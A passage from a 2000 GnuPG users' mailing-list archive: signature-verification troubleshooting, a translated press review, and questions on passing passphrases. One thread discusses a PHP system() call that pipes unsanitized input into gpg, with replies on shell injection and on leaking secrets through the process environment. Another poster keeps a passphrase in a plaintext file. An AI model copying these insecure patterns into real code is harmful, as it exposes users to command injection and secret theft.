(GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQE6LODAqUQWN/hplRsRAhI7AJwIjlOu4AcjkSNacz7Mc9UTCFqKuQCghKr7 Htvmp6ldCIXqIDTeWLLSrjo= =0b/V -----END PGP SIGNATURE----- --------------Boundary-00=_VKH351O302IGJLA6Q69Q Content-Type: message/rfc822; charset="iso-8859-1"; name="michael-0512-latin1.mail" Content-Transfer-Encoding: 7bit Content-Description: the signed email Content-Disposition: attachment; filename="michael-0512-latin1.mail" >From Michael.Haeckel@stud.uni-bayreuth.de Mon Dec 4 21:54:03 2000 Received: from nets5.rz.rwth-aachen.de (nets5.rz.RWTH-Aachen.DE [137.226.144.13]) by helena.mathA.rwth-aachen.de (SGI-8.9.3/8.9.3) with ESMTP id VAA25820 for ; Mon, 4 Dec 2000 21:55:27 +0100 (MET) Received: from mout1.freenet.de (exim@mout1.freenet.de [194.97.50.132]) by nets5.rz.rwth-aachen.de (8.10.1/8.10.1/5) with ESMTP id eB4KtQm29467 for ; Mon, 4 Dec 2000 21:55:27 +0100 (MET) Received: from [194.97.50.138] (helo=mx0.freenet.de) by mout1.freenet.de with esmtp (Exim 3.20 #2) id 1432dF-0001XM-00 for ingo@matha.rwth-aachen.de; Mon, 04 Dec 2000 21:54:41 +0100 Received: from aff94.pppool.de ([213.6.255.148] helo=michael) by mx0.freenet.de with smtp (Exim 3.20 #2) id 1432dE-0007Oi-00 for ingo@mathA.rwth-aachen.de; Mon, 04 Dec 2000 21:54:40 +0100 Content-Type: text/plain; charset="iso-8859-1" From: Michael Haeckel To: Ingo Kloecker Subject: Re: PATCH: Bug#16362: gpg: only latin1 messages can be signed correctly Date: Mon, 4 Dec 2000 21:54:03 +0100 X-Mailer: KMail [version 1.2] References: <200012011727.SAA06497@helena.mathA.rwth-aachen.de> <00120410594100.02469@michael> <0012042056230B.12541@atlas> In-Reply-To: <0012042056230B.12541@atlas> X-Accept-Language: de, en MIME-Version: 1.0 Message-Id: <00120421540300.05232@michael> Content-Transfer-Encoding: 8bit Status: R X-Status: N -----BEGIN PGP SIGNED MESSAGE----- On Monday, 4. December 2000 20:56, you wrote: > > Ich habe deine Mail mit der laut GPG fehlerhaften Signatur mal > angehaengt (von KMail aus abgespeichert). Auch bei manueller > Ueberpruefung der abgespeicherten Mail meldet GPG eine fehlerhafte > Signatur. Die zweite von dir signierte Mail (PATCH2: Bug#16362 ...) hat > uebrigens auch eine fehlerhafte Signatur. Laut PGP hier immer noch korrekt. Die Signaturen deiner Mails werden hier von PGP auch als korrekt gemeldet, nachdem ich deinen Schlüssel in meine Liste aufgenommen habe. Kann es sein, daß ich die selbe Adresse im From: header verwenden muß, als ich für den Schlüssel verwendet habe? In diesem Mail mache ich das einmal. > Weisst du zufaellig welche Schriftart du als utf-8-Font installiert > hast? Aendert sich die Schriftart beim Wechsel von koi8-r encoding zu > utf-8 encoding? Bei mir sieht die utf-8 Schrift genau so aus wie die > latin1 Schrift, waehrend die koi8-r Schrift deutlich breiter ist. Als unicode Font habe ich Fixed, die Kodierung heißt nicht utf-8, sondern iso10646-1. Das mit der Breite ist bei mir auch ähnlich. Seit ich nur noch unicode für die Mails verwende natürlich nicht mehr. Viele Grüße, Michael Häckel -----BEGIN PGP SIGNATURE----- Version: PGPfreeware 5.0i for non-commercial use MessageID: GL8h9oWzVePQQFZx6lH+o7j1Lonkn4s5 iQA/AwUAOiwEbg7c1ZAtjdZKEQKE7QCgkXiIoOK+k2vSkofNawgpmRn/8aUAn2QL kl9QzHkWk6Pve1MfGix7NP6o =2uo3 -----END PGP SIGNATURE----- --------------Boundary-00=_VKH351O302IGJLA6Q69Q Content-Type: text/plain; charset="iso-8859-1"; name="michael_haeckel_public_key.asc" Content-Transfer-Encoding: base64 Content-Description: Michael Haeckel's public key Content-Disposition: attachment; filename="michael_haeckel_public_key.asc" LS0tLS1CRUdJTiBQR1AgUFVCTElDIEtFWSBCTE9DSy0tLS0tClZlcnNpb246IFBHUGZyZWV3YXJl IDUuMGkgZm9yIG5vbi1jb21tZXJjaWFsIHVzZQoKbVFHaUJEanRxYkFSQkFEZTNzanpqM0dqT2xW cVJYMkN0SUtmRWV6azNaSGlYS0lwWDNmckliVWlRbHZ3VE9NYQpWNmdWaU91aGZqdUZ0eldFcnlD azhvK3lzb01XNVVpblk5NHJlNEk2Qyt4R0prZS9tcURXb3ZsbzVGV0dtZDFxCms0em5CeE9wNVIr ZU9Nbm5aMDEwZlNQODJvcDlmZ0Z6UUpEbDNMSkIwSktOQ0VRY2kzVHBuK3Y5N3dDZy8vWlcKc01F TWE4c3ZuN0Z5eGZoL0xuL2FXUThFQUtUZkM3Q1J2WnEvUEZ1K0xpN1BHSmdrQzlJZkVWTTRtRExO dXNDMQpnclIzQzdmdW42dk5VMHVnS3prQVdydE5DWmFjT1BxdDhueTRGR0loV3dHdjNjYTZrMEls dTllTzlwMUhQMWlJCk1zbjI3NGRVWE5Qd09BWXlUblhCRWw0Z0xraStPT2NtSGNkY05FOCtuRHpz V25RRUJYUzArYnEvdFJrcjhpcHkKa045dEEvOUF4RVZsVWxkaVZpamVLZ0l0RnF1T0xCUkphU0tx OHYwaTN6VXlVMWlCMXFDMDdDejVFdFpMbmwxNgpqNUd1YjJMbFJWWDVha3dGRVFqS3ZvcGFiY0xZ Z1ZleHF2NGQ4U1c1MmRrcnc1R2xPSDlkcnZpRzFJcG9Wdk94ClhLYWp4STBoaElsYXp4WW5CRlQ4 WWpCWFpzV2dvOGJvaDdyWVFBVEJ3cXllMHM3VkZyUTJUV2xqYUdGbGJDQkkKWVdWamEyVnNJRHhO YVdOb1lXVnNMa2hoWldOclpXeEFjM1IxWkM1MWJta3RZbUY1Y21WMWRHZ3VaR1UraVFCTApCQkFS QWdBTEJRSTQ3YW13QkFzREFRSUFDZ2tRRHR6VmtDMk4xa3JFUFFDZUwxWjM0WTVGR3JUcGpUWVNR UStoCmIvUW9qVVVBbjE3RzV0aDd1aTFJWFEyZzRzM1phM283SHRVRXVRRU5CRGp0cWI0UUJBRG5k akgrUXlRMldBN3QKUTZBSFpVY09HeklUNk1odGlEYmxMOXpXVm5MNWxYNkZPemc1cVZiaHNFSTY0 UEFLSFRTb3ZUSDdMeWFNajB2SgpkZEtlRDhYWGtmcnplOTZyQjErV09pS3VJNmphbGsxdko5Z0Jz S0hGRVVFU0FtcnoxdkR6TjFMT2xXakZINjNiCnVKVndFenhmUEFWcjFpTGQvVTVGY1lBZDZ0akJB UUFDQWdRQTRMQWpjelNyci9sK1dIcmdJdHg0OUo1TTB1VnkKdmNucGxRc0NQMW9yemovL1M4OVNZ UkZhaHE0ZkQ2cWVmV2RjU0RLUWkwZU1wTS9LNGlJNEc1ZmcySloxanJFcApXclZac20wR1h2Q1k3 MFR1NTIvSzFXeUQ3dm5UcVZzSGNDYUxiM2N1YUpjMmlFUlJuZkNURnBlWVRVaDNsVzc2CjlnRkxU cGlLQmIwQ1VRaUpBRDhEQlJnNDdhbStEdHpWa0MyTjFrb1JBZzJmQUo5Qys3K3JOUlVKNkNnQXll Tm4KUUlGa004Um04Z0NnN3k0QjVQWmx4QTRCV093QUh1SCtiNmZ1TXVZPQo9UFVoeQotLS0tLUVO RCBQR1AgUFVCTElDIEtFWSBCTE9DSy0tLS0tCg== --------------Boundary-00=_VKH351O302IGJLA6Q69Q Content-Type: application/pgp-keys; name="public_key.asc" Content-Transfer-Encoding: base64 Content-Description: Michael Haeckel's key reexported via GPG Content-Disposition: attachment; filename="public_key.asc" LS0tLS1CRUdJTiBQR1AgUFVCTElDIEtFWSBCTE9DSy0tLS0tClZlcnNpb246IEdudVBHIHYxLjAu NCAoR05VL0xpbnV4KQpDb21tZW50OiBGb3IgaW5mbyBzZWUgaHR0cDovL3d3dy5nbnVwZy5vcmcK Cm1RR2lCRGp0cWJBUkJBRGUzc2p6ajNHak9sVnFSWDJDdElLZkVlemszWkhpWEtJcFgzZnJJYlVp UWx2d1RPTWEKVjZnVmlPdWhmanVGdHpXRXJ5Q2s4byt5c29NVzVVaW5ZOTRyZTRJNkMreEdKa2Uv bXFEV292bG81RldHbWQxcQprNHpuQnhPcDVSK2VPTW5uWjAxMGZTUDgyb3A5ZmdGelFKRGwzTEpC MEpLTkNFUWNpM1Rwbit2OTd3Q2cvL1pXCnNNRU1hOHN2bjdGeXhmaC9Mbi9hV1E4RUFLVGZDN0NS dlpxL1BGdStMaTdQR0pna0M5SWZFVk00bURMTnVzQzEKZ3JSM0M3ZnVuNnZOVTB1Z0t6a0FXcnRO Q1phY09QcXQ4bnk0RkdJaFd3R3YzY2E2azBJbHU5ZU85cDFIUDFpSQpNc24yNzRkVVhOUHdPQVl5 VG5YQkVsNGdMa2krT09jbUhjZGNORTgrbkR6c1duUUVCWFMwK2JxL3RSa3I4aXB5CmtOOXRBLzlB eEVWbFVsZGlWaWplS2dJdEZxdU9MQlJKYVNLcTh2MGkzelV5VTFpQjFxQzA3Q3o1RXRaTG5sMTYK ajVHdWIyTGxSVlg1YWt3RkVRakt2b3BhYmNMWWdWZXhxdjRkOFNXNTJka3J3NUdsT0g5ZHJ2aUcx SXBvVnZPeApYS2FqeEkwaGhJbGF6eFluQkZUOFlqQlhac1dnbzhib2g3cllRQVRCd3F5ZTBzN1ZG clEyVFdsamFHRmxiQ0JJCllXVmphMlZzSUR4TmFXTm9ZV1ZzTGtoaFpXTnJaV3hBYzNSMVpDNTFi bWt0WW1GNWNtVjFkR2d1WkdVK2lFc0UKRUJFQ0FBc0ZBamp0cWJBRUN3TUJBZ0FLQ1JBTzNOV1FM WTNXU3NROUFKNHZWbmZoamtVYXRPbU5OaEpCRDZGdgo5Q2lOUlFDZlhzYm0ySHU2TFVoZERhRGl6 ZGxyZWpzZTFRUzVBUTBFT08ycHZoQUVBT2QyTWY1REpEWllEdTFECm9BZGxSdzRiTWhQb3lHMklO dVV2M05aV2N2bVZmb1U3T0RtcFZ1R3dRanJnOEFvZE5LaTlNZnN2Sm95UFM4bDEKMHA0UHhkZVIr dk43M3FzSFg1WTZJcTRqcU5xV1RXOG4yQUd3b2NVUlFSSUNhdlBXOFBNM1VzNlZhTVVmcmR1NAps WEFUUEY4OEJXdldJdDM5VGtWeGdCM3EyTUVCQUFJQ0JBRGdzQ056Tkt1ditYNVlldUFpM0hqMG5r elM1WEs5CnllbVZDd0kvV2l2T1AvOUx6MUpoRVZxR3JoOFBxcDU5WjF4SU1wQ0xSNHlrejhyaUlq Z2JsK0RZbG5XT3NTbGEKdFZteWJRWmU4Smp2Uk83bmI4clZiSVB1K2RPcFd3ZHdKb3R2ZHk1b2x6 YUlSRkdkOEpNV2w1aE5TSGVWYnZyMgpBVXRPbUlvRnZRSlJDSWcvQXdVWU9PMnB2ZzdjMVpBdGpk WktFUUlObndDZlF2dS9xelVWQ2Vnb0FNbmpaMENCClpEUEVadklBb084dUFlVDJaY1FPQVZqc0FC N2gvbStuN2pMbQo9WEZXMQotLS0tLUVORCBQR1AgUFVCTElDIEtFWSBCTE9DSy0tLS0tCg== --------------Boundary-00=_VKH351O302IGJLA6Q69Q-- -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From Florian.Weimer@RUS.Uni-Stuttgart.DE Tue Dec 5 12:31:28 2000 From: Florian.Weimer@RUS.Uni-Stuttgart.DE (Florian Weimer) Date: 05 Dec 2000 13:31:28 +0100 Subject: possible security hole In-Reply-To: <20001205083329.A20381@gnupg.de> References: <000c01c05e68$c1667160$01a800c0@derekvok> <20001205083329.A20381@gnupg.de> Message-ID: Werner Koch writes: > On Mon, 4 Dec 2000, Derek Vokey wrote: > > > "echo $sensitiveinfo|gpg --homedir /my/home/dir --always-trust -ear me|mail > > to\@me.com" > > I don't know PHP, but I assume that you are using something like > system(3) to this job. The problem is that you might be able to > trick the shell in doing evil thing by having shell code in > $seinsitiveinfo. > > Some possible solutions: > > * sanitize $sensitiveinfo by removing all characters except for > digits, underscore, space and letters :-) If you do this, other (non-privileged) users on the same machine are able to retrieve $sensitiveinfo by examining the environment of the shell process. -- Florian Weimer Florian.Weimer@RUS.Uni-Stuttgart.DE University of Stuttgart http://cert.uni-stuttgart.de/ RUS-CERT +49-711-685-5973/fax +49-711-685-5898 -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From graham@todd276.worldonline.co.uk Tue Dec 5 13:42:07 2000 From: graham@todd276.worldonline.co.uk (Graham) Date: Tue, 05 Dec 2000 13:42:07 GMT Subject: bad sig with gpg but good sig with pgp5.0i and pgp6.5.8 In-Reply-To: <00120513321202.18426@atlas> References: <00120513321202.18426@atlas> Message-ID: <20001205133957.33E3.GRAHAM@todd276.worldonline.co.uk> Hi there, Ingo Kloecker, On 05 December 2000, I received the following message from you regarding "bad sig with gpg but good sig with pgp5.0i and pgp6.5.8" IK> The problem is that PGP 5.0i and PGP 6.5.8 both tell me that the IK> signature is good. But GPG 1.0.4 says the signature is bad. I looked in IK> the FAQ, the HowTos, the GPH and the mailing list archive but I still IK> got no clue. Under Windows, I got a good sig with PGP 6.5.8 and GnuPG 1.0.4. Graham reply to: graham@todd276.worldonline.co.uk -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From Ralf.Huels@schufa.de Tue Dec 5 14:15:53 2000 From: Ralf.Huels@schufa.de (Huels, Ralf KSV) Date: 5 Dec 2000 15:15:53 +0100 Subject: bad sig with gpg but good sig with pgp5.0i and pgp6.5.8 Message-ID: <51896D38E5E4D111BE560001FA68BA368456C1@SBO1002> > Under Windows, I got a good sig with PGP 6.5.8 and GnuPG 1.0.4. And I got a bad sig with GnuPG 1.0.4. The file seems to have Unix style newlines (0x0A instead of 0x0D0A). I suspect it´s some conversion issue with charset or newline characters. Tschüß, Ralf -- Ralf Hüls Bismarckplatz KSV Kreditschutz-Vereinigung GmbH 44866 Bochum Score-Consult Tel. 02327/9114-28 http://www.schufa.de/ Fax. 02327/8 40 27 -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From jackmc-gnupg-users@lorentz.com Tue Dec 5 15:54:14 2000 From: jackmc-gnupg-users@lorentz.com (Jack McKinney) Date: Tue, 5 Dec 2000 09:54:14 -0600 Subject: Gnu-pg reviewed by german newspaper In-Reply-To: <51896D38E5E4D111BE560001FA68BA368456B2@SBO1002>; from Ralf.Huels@schufa.de on Tue, Dec 05, 2000 at 07:58:31AM +0100 References: <51896D38E5E4D111BE560001FA68BA368456B2@SBO1002> Message-ID: <20001205095414.A14731@stocks.pillory.com> --Nq2Wo0NMKNjxTN9z Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable Translation of previous posting (babelfish.altavista.com): The popular encoding program Pretty Good Privacy (PGP) got a competition wh= ich can be taken seriously: Gnu Privacy Guard (Gnu PG). Safety experts from all world call the program one = of the best encoding systems on the market. Even from official page there is support. Thus for example the Fede= ral Ministry for Economic Affairs belongs to the promoters of the program. Actually a E-Mail has in fact the status o= f a postcard. Practically everyone can along-read the message. It can change and to the addressee pass it on even = without knowledge of sender and recipient. Who wants to prevent that, an encoding program must use. The sof= tware most popular with distance is Pretty Good Privacy. But some openly put weak points to have many users fri= ghtens.=20 The encoding program Pretty Good Privacy applied with its conception as abs= olutely safe system. If PGP with the sender and recipient are in the use, the Mitlesen of confidential Mails is = almost excluded through third. PGP checked automatically, whether the Mail was changed during the feed of the sender t= o the recipient, and supplies a high-grade safe digital signature. The used procedure for the encoding offe= rs an enormous number of different codes. A value not crackable after today's yardsticks.=20 But PGP is guessed/advised into the criticism. The software with the source= text is delivered, but the manufacturer for itself wants to keep some secrets. Thus PGP permits the mechanism of th= ird keys, whereby many users lost the confidence into the safety software. Already since some time rumors circula= te that national organizations can along-read as for example the US data police national Security Agency (NSA)= encoded Mails with the help of a general key. Safety experts warn therefore already for a long time to trust= PGP blindly. Differently it looks with the Gnu Privacy Guard. The free program is constantly improved and extended by = many " leisure programmers ". Since to it the entire source text must be for order, also no secret back doors c= an be inserted. For the first time Gnu PG was introduced by the Duesseldorfer Werner cook in September 1999 for the opera= ting system Unix. Since then is the software for numerous other systems available, among them also for Windows = 9x, Windows NT, Linux, OS/2 and Sun OS.=20 -- "There is no parameter that makes it impossible Jack McKinney for you to perform still more excellently." jackmc@lorentz.com -Mario Cuomo, on the lack of a clock in baseball http://www.lorentz.c= om 1024D/D68F2C07 4096g/38AEF076 --Nq2Wo0NMKNjxTN9z Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (GNU/Linux) Comment: For info see http://www.gnupg.org iEYEARECAAYFAjotD6YACgkQimeon9aPLAeQ+gCfRGzVhoP8QFVocpG9W/34hMWv azMAmwXefsiRlk+gPKxGVZba2bIU4Hvt =D+AD -----END PGP SIGNATURE----- --Nq2Wo0NMKNjxTN9z-- -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From jackmc-gnupg-users@lorentz.com Tue Dec 5 15:57:09 2000 From: jackmc-gnupg-users@lorentz.com (Jack McKinney) Date: Tue, 5 Dec 2000 09:57:09 -0600 Subject: bad sig with gpg but good sig with pgp5.0i and pgp6.5.8 In-Reply-To: <51896D38E5E4D111BE560001FA68BA368456C1@SBO1002>; from Ralf.Huels@schufa.de on Tue, Dec 05, 2000 at 03:15:53PM +0100 References: <51896D38E5E4D111BE560001FA68BA368456C1@SBO1002> Message-ID: <20001205095708.B14731@stocks.pillory.com> --DKU6Jbt7q3WqK7+M Content-Type: text/plain; charset=iso-8859-1 Content-Disposition: inline Content-Transfer-Encoding: quoted-printable Big Brother tells me that Huels, Ralf KSV wrote: > > Under Windows, I got a good sig with PGP 6.5.8 and GnuPG 1.0.4. >=20 > And I got a bad sig with GnuPG 1.0.4. The file seems to have Unix style > newlines (0x0A instead of 0x0D0A). I suspect it=B4s some conversion issue= =20 > with charset or newline characters. See the '--textmode' option. -- "I'm walking home from school, and I'm watching Jack McKinney some men building a new house, and the guy jackmc@lorentz.com hammering on the roof calls me a paranoid little http://www.lorentz.c= om weirdo.... in Morse code." 1024D/D68F2C07 4096g= /38AEF076 -Emo Philips --DKU6Jbt7q3WqK7+M Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (GNU/Linux) Comment: For info see http://www.gnupg.org iEYEARECAAYFAjotEFQACgkQimeon9aPLAdeOQCgmb8c1R0UOIBsROd/yW/0DTbs 6XEAn29a6PQ+lEmHLMGzQyJ9/UkdCBRD =inbD -----END PGP SIGNATURE----- --DKU6Jbt7q3WqK7+M-- -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From ingo@mathA.rwth-aachen.de Tue Dec 5 17:14:54 2000 From: ingo@mathA.rwth-aachen.de (Ingo Kloecker) Date: Tue, 5 Dec 2000 18:14:54 +0100 Subject: bad sig with gpg but good sig with pgp5.0i and pgp6.5.8 In-Reply-To: <20001205095708.B14731@stocks.pillory.com> References: <51896D38E5E4D111BE560001FA68BA368456C1@SBO1002> <20001205095708.B14731@stocks.pillory.com> Message-ID: <00120518145405.18426@atlas> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On Tuesday, 5. December 2000 16:57, Jack McKinney wrote: > Big Brother tells me that Huels, Ralf KSV wrote: > > > Under Windows, I got a good sig with PGP 6.5.8 and GnuPG 1.0.4. > > > > And I got a bad sig with GnuPG 1.0.4. The file seems to have Unix > > style newlines (0x0A instead of 0x0D0A). I suspect it´s some > > conversion issue with charset or newline characters. > > See the '--textmode' option. In my original posting I forgot to tell you that I use GnuPG on Linux. gpg --verify --textmode <*the attached file in my original posting* gives the following output: gpg: Signature made Mon 04 Dez 2000 21:54:06 MET using DSA key ID 2D8DD64A gpg: BAD signature from "Michael Haeckel " The same command line without '--textmode' gives the same output. So the '--textmode' option doesn't seem to be the solution. After some research I found out how the message with the good/bad signature was composed. Because of a bug (or a feature) PGP 5.0i isn't able to clearsign a message if this message contains 8-bit characters (like german umlauts). Therefore the developers of KMail programmed a work around. The message is first signed with a detached signature and then a clearsigned message is composed as follows: "-----BEGIN PGP SIGNED MESSAGE-----\n\n" + unsigned_message + "\n" + detached_signature Now the question is: Why do PGP 5.0i (under Linux), PGP 6.5.8 (under Linux and Windows) and (according to Graham) even GnuPG 1.0.4 (under Windows) accept this message as correctly signed while GnuPG 1.0.4 (under Linux) doesn't accept the signature? There seems to be some weird discrepancy between the Windows and the Linux version of GnuPG. Regards, Ingo - -- Ingo Klöcker Lehrstuhl A für Mathematik RWTH Aachen 52056 Aachen -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQE6LSKPqUQWN/hplRsRAndaAKCljbesTedkxBOwitKUEPj7jjuFLACghRsG IL9K9yYf0agkw2GGy75FDYI= =7Woj -----END PGP SIGNATURE----- -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From turfdog@planetturf.ca Tue Dec 5 20:46:16 2000 From: turfdog@planetturf.ca (Derek Vokey) Date: Tue, 5 Dec 2000 12:46:16 -0800 Subject: possible security hole References: <000c01c05e68$c1667160$01a800c0@derekvok><20001205083329.A20381@gnupg.de> Message-ID: <000e01c05efc$6bf10120$01a800c0@derekvok> There is no telnet access or any other command line access to anyone other than root on this server. Is there a way to examine the environment of the shell process strictly through cgi? ----- Original Message ----- From: "Florian Weimer" To: Sent: Tuesday, December 05, 2000 4:31 AM Subject: Re: possible security hole > Werner Koch writes: > > > On Mon, 4 Dec 2000, Derek Vokey wrote: > > > > > "echo $sensitiveinfo|gpg --homedir /my/home/dir --always-trust -ear me|mail > > > to\@me.com" > > > > I don't know PHP, but I assume that you are using something like > > system(3) to this job. The problem is that you might be able to > > trick the shell in doing evil thing by having shell code in > > $seinsitiveinfo. > > > > Some possible solutions: > > > > * sanitize $sensitiveinfo by removing all characters except for > > digits, underscore, space and letters :-) > > If you do this, other (non-privileged) users on the same machine are > able to retrieve $sensitiveinfo by examining the environment of the > shell process. > > -- > Florian Weimer Florian.Weimer@RUS.Uni-Stuttgart.DE > University of Stuttgart http://cert.uni-stuttgart.de/ > RUS-CERT +49-711-685-5973/fax +49-711-685-5898 > > -- > Archive is at http://lists.gnupg.org - Unsubscribe by sending mail > with a subject of "unsubscribe" to gnupg-users-request@gnupg.org > -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From wk@gnupg.org Tue Dec 5 17:52:36 2000 From: wk@gnupg.org (Werner Koch) Date: Tue, 5 Dec 2000 18:52:36 +0100 Subject: bad sig with gpg but good sig with pgp5.0i and pgp6.5.8 In-Reply-To: <00120518145405.18426@atlas>; from ingo@mathA.rwth-aachen.de on Tue, Dec 05, 2000 at 06:14:54PM +0100 References: <51896D38E5E4D111BE560001FA68BA368456C1@SBO1002> <20001205095708.B14731@stocks.pillory.com> <00120518145405.18426@atlas> Message-ID: <20001205185236.G20381@gnupg.de> On Tue, 5 Dec 2000, Ingo Kloecker wrote: > The same command line without '--textmode' gives the same output. --textmode does only work on the encoding side. > "-----BEGIN PGP SIGNED MESSAGE-----\n\n" + unsigned_message + "\n" + > detached_signature Probably KMail did not generate the detached_signature in textmode, whcih is required. > Why do PGP 5.0i (under Linux), PGP 6.5.8 (under Linux and Windows) and PGP 5.0i is really buggy - don't use it. > There seems to be some weird discrepancy between the Windows and the > Linux version of GnuPG. The only difference is the way lineendings are handled: CR,LF for Windows, LF for Unix. However if a signature is created in textmode, this does not matter. Trailing whitespaces may be another problem. See the ML archive for details. Werner -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From lists@wordit.com Tue Dec 5 22:36:32 2000 From: lists@wordit.com (Marcus) Date: Tue, 05 Dec 2000 23:36:32 +0100 Subject: Passphrase from external program, script, or batch file In-Reply-To: <000e01c05efc$6bf10120$01a800c0@derekvok> References: <000c01c05e68$c1667160$01a800c0@derekvok> <20001205083329.A20381@gnupg.de> <000e01c05efc$6bf10120$01a800c0@derekvok> Message-ID: <200012052336320524.00616640@smtprelay.t-online.de> Since there were no replies on how to send the passphrase via the command line in Windows/DOS, how does it work on Unix? I saw something like --passphrase-fd in the archive, but I don't understand what it means or is really doing. Can anybody explain? Maybe with that I can ask some Perl people how it might be done in Perl on Windows. Btw, I looked at the Perl modules for GPG and they all seem very Unix specific, using pipes and forking which I don't think will work on Windows. One module failed because it reads the Unix path variable, and couldn't read the path on Windows correctly. Thanks, Marcus Friedlaender -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From johanw@vulcan.xs4all.nl Tue Dec 5 23:07:10 2000 From: johanw@vulcan.xs4all.nl (Johan Wevers) Date: Wed, 6 Dec 2000 00:07:10 +0100 (MET) Subject: Passphrase from external program, script, or batch file In-Reply-To: <200012052336320524.00616640@smtprelay.t-online.de> from Marcus at "Dec 5, 2000 11:36:32 pm" Message-ID: <200012052307.AAA00765@vulcan.xs4all.nl> Marcus wrote: > I saw something like --passphrase-fd in the archive, but I don't > understand what it means or is really doing. Can anybody explain? A file descriptor is an even more low-level function than a file. They are represented by numbers, 0 = standard input, 1 = standard output and 2 = standard error (on DOS, stderr == stdout, NT follows the unix convention here). However, you can also open higher numbers. If you have opened such an fd, you can send data through it via something that is called a pipe. One end sends data, the other end reads it (for 2-way communication you'll have to open 2 fd's). Opening a fd and a pipe to send data through it are standard methods in many programming languages, including C and perl. More information about fd's can be found in K&R chapter 8, and for piping through an fd I have some example code in C (unix specific I'm affraid, but the piping might also work in windows) if you're interested (a program I once wrote to communicate this way with pgp 2.6.3). -- ir. J.C.A. Wevers // Physics and science fiction site: johanw@vulcan.xs4all.nl // http://www.xs4all.nl/~johanw/index.html PGP/GPG public keys at http://www.xs4all.nl/~johanw/pgpkeys.html -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From gadicath@yahoo.com Wed Dec 6 02:24:27 2000 From: gadicath@yahoo.com (David) Date: Wed, 6 Dec 2000 13:24:27 +1100 Subject: Depreciated algorithm Message-ID: <20001206132427.A3135@interact.net.au> --mP3DRpeJDSE+ciuQ Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable Hi just wondering why I get: =09 gpg: ELG-E/RIJNDAEL encrypted gpg: this cipher algorithm is depreciated; please use a more standard one! This only occurs when people use my key to encrypt... I can stop it from happening if I use --cipher-algo BLOWFISH. Just wondering why its happening and how I could stop it from happening. Thanks in advance David --mP3DRpeJDSE+ciuQ Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQE6LaNbBQgClllX9yMRAsS5AJ9JiIzXXHchkbt+cWkS43Y+i/OS+gCfc9fa MipmDpw4el9crMAnmaAMdiA= =jKVS -----END PGP SIGNATURE----- --mP3DRpeJDSE+ciuQ-- -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From lists@wordit.com Wed Dec 6 03:21:31 2000 From: lists@wordit.com (Marcus) Date: Wed, 06 Dec 2000 04:21:31 +0100 Subject: Windows shell woes (was: Passphrase from external program...) In-Reply-To: <200012052307.AAA00765@vulcan.xs4all.nl> References: <200012052307.AAA00765@vulcan.xs4all.nl> Message-ID: <200012060421310509.008D46F7@smtprelay.t-online.de> On 06.12.00 at 00:07 Johan Wevers wrote: >A file descriptor is an even more low-level function than a file... Thanks, I understand how it works now. The only thing I've got working on Windows is to use a file containing the passphrase. The script could create a temporary file, but I don't feel too pleased about having a password stored in a file at all. I guess one could encrypt the temp file before it's written. This is it in Perl: system "gpg.exe -o $file.gpg --passphrase-fd 0 -c $file < pass.txt"; Windows will only accept a file as input, grrr. Does anybody know how to pass the input from stdin? The only workaround I can think of is to >More information about fd's can be found in K&R chapter 8, and for piping through an fd... I'll take a peek. >I have some example code in C (unix specific I'm affraid, >but the piping might also work in windows) if you're interested (a program >I once wrote to communicate this way with pgp 2.6.3). Yes please. Thanks, Marcus Friedlaender -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From fw@deneb.enyo.de Tue Dec 5 22:34:04 2000 From: fw@deneb.enyo.de (Florian Weimer) Date: 05 Dec 2000 23:34:04 +0100 Subject: possible security hole In-Reply-To: <000e01c05efc$6bf10120$01a800c0@derekvok> References: <000c01c05e68$c1667160$01a800c0@derekvok> <20001205083329.A20381@gnupg.de> <000e01c05efc$6bf10120$01a800c0@derekvok> Message-ID: <873dg2ijkz.fsf@deneb.enyo.de> "Derek Vokey" writes: > There is no telnet access or any other command line access to anyone other > than root on this server. Is there a way to examine the environment of the > shell process strictly through cgi? What does "strictly through cgi" mean? If you allow uploading arbitrary CGI programs by users, that's almost equivalent to shell access and certainly sufficient for reading the environment of other processes, at least on Linux (where you can read /proc) and some other systems (where you can invoke 'ps e'). > ----- Original Message ----- Eh, your quoting style is strange. -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From Nils@infosun.fmi.uni-passau.de Wed Dec 6 08:05:42 2000 From: 